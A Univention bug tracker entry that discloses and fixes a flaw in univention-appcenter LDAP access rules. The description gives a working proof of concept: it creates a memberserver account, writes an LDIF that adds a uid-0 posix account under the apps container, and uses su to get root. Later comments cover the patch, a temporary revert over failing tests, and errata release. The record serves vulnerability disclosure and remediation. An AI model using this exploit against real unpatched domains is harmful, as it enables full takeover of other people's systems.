Bug 41724 - univention-appcenter - take over complete domain as memberserver
univention-appcenter - take over complete domain as memberserver
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: LDAP
UCS 4.1
Other Linux
: P5 critical (vote)
: UCS 4.1-2-errata
Assigned To: Florian Best
Dirk Wiesenthal
:
: 32886 (view as bug list)
Depends on: 41715 41797
Blocks:
  Show dependency treegraph
 
Reported: 2016-07-04 14:39 CEST by Florian Best
Modified: 2021-06-23 07:29 CEST (History)
3 users (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Florian Best univentionstaff 2016-07-04 14:39:11 CEST
The ACL rules in the package univention-appcenter have to be adjusted.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
Comment 1 Florian Best univentionstaff 2016-07-04 19:06:37 CEST
*** Bug 32886 has been marked as a duplicate of this bug. ***
Comment 2 Florian Best univentionstaff 2016-07-04 19:58:03 CEST
univention-appcenter (5.0.21-14):
r70813 | Bug #41724: restrict access to univentionApp object class

univention-appcenter.yaml:
r70817 | YAML Bug #41724
Comment 3 Dirk Wiesenthal univentionstaff 2016-07-11 22:04:23 CEST
Tested it. One may still install Apps, they can be registered. Also, the example exploit is not possible anymore. Normally: VERIFIED. But we have >50 tests failing since the Bug was RESOLVED and they do not go away. I have reverted the patch to see whether this indeed has something to do with this very bug.
Comment 4 Florian Best univentionstaff 2016-07-12 07:12:49 CEST
(In reply to Dirk Wiesenthal from comment #3)
> Tested it. One may still install Apps, they can be registered. Also, the
> example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> tests failing since the Bug was RESOLVED and they do not go away. I have
> reverted the patch to see whether this indeed has something to do with this
> very bug.

There are 32 less errors this night. But I guess this is caused by svn r70925 - not the revert.
Comment 5 Stefan Gohmann univentionstaff 2016-07-12 07:16:52 CEST
(In reply to Florian Best from comment #4)
> (In reply to Dirk Wiesenthal from comment #3)
> > Tested it. One may still install Apps, they can be registered. Also, the
> > example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> > tests failing since the Bug was RESOLVED and they do not go away. I have
> > reverted the patch to see whether this indeed has something to do with this
> > very bug.
> 
> There are 32 less errors this night. But I guess this is caused by svn
> r70925 - not the revert.

Yes, the revert was to late for the last Jenkins run.
Comment 6 Florian Best univentionstaff 2016-07-12 07:42:24 CEST
(In reply to Stefan Gohmann from comment #5)
> (In reply to Florian Best from comment #4)
> > (In reply to Dirk Wiesenthal from comment #3)
> > > Tested it. One may still install Apps, they can be registered. Also, the
> > > example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> > > tests failing since the Bug was RESOLVED and they do not go away. I have
> > > reverted the patch to see whether this indeed has something to do with this
> > > very bug.
> > 
> > There are 32 less errors this night. But I guess this is caused by svn
> > r70925 - not the revert.
> 
> Yes, the revert was to late for the last Jenkins run.
Yes, the old version was installed in the tests:
univention-management-console-module-appcenter 5.0.21-14.182.201607041949

I will revert the revert somewhen today. There are still ~6 different tests failing due to Bug #41715.
Comment 7 Florian Best univentionstaff 2016-07-12 15:47:48 CEST
univention-appcenter (5.0.21-17):
r70935 | Revert "* Bug #41724: Revert"
Comment 8 Dirk Wiesenthal univentionstaff 2016-07-18 11:51:06 CEST
OK works.
Tests are fine again.
Comment 9 Janek Walkenhorst univentionstaff 2016-07-21 15:16:23 CEST
<http://errata.software-univention.de/ucs/4.1/218.html>